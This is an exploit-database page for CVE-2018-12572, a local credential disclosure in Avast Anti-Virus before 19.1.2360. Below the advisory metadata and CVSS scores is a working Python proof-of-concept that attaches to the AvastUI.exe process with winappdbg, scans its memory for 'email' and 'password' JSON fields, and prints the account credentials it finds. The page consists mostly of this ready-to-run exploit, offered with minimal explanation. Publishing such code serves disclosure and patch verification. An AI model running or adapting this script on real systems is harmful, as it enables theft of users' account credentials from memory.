Avast Anti-Virus Local Credential Disclosure

2019.02.12
Credit: Nathu Nandwani
Risk: Low
Local: Yes
Remote: No
CVE: CVE-2018-12572
CWE: CWE-255


CVSS Base Score: 2.1/10
Impact Subscore: 2.9/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

# Exploit Title: Avast Anti-Virus Local Credentials Disclosure < 19.1.2360 # Date: 01/18/2019 # Exploit Author: Nathu Nandwani # Website: http://nandtech.co/ # Version: before 19.1.2360 (build 19.1.4142.0) # Tested on: Windows 10 x64 # CVE: CVE-2018-12572 # Based on LiquidWorm's and Yakir Wizman's proof of concepts from winappdbg import Debug, Process debug = Debug() processname = "AvastUI.exe" pid = 0 mem_contents = [] email = "" password = "" try: debug.system.scan_processes() for (process, process_name) in debug.system.find_processes_by_filename(processname): pid = process.get_pid() if pid is not 0: print ("AvastUI PID: " + str(pid)) process = Process(pid) for i in process.search_regexp('"password":"'): mem_contents.append(process.read(i[0], 200)) print "Dump: " print process.read(i[0], 200) for i in mem_contents: password = i.split(",")[0] for i in process.search_regexp('"email":"'): mem_contents.append(process.read(i[0], 200)) print "Dump: " print process.read(i[0], 200) for i in mem_contents: email = i.split(",")[0] if email != "" and password != "": print "" print "Found Credentials from Memory!" print email print password else: print "No credentials found!" else: print "Avast not running!" finally: debug.stop()


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top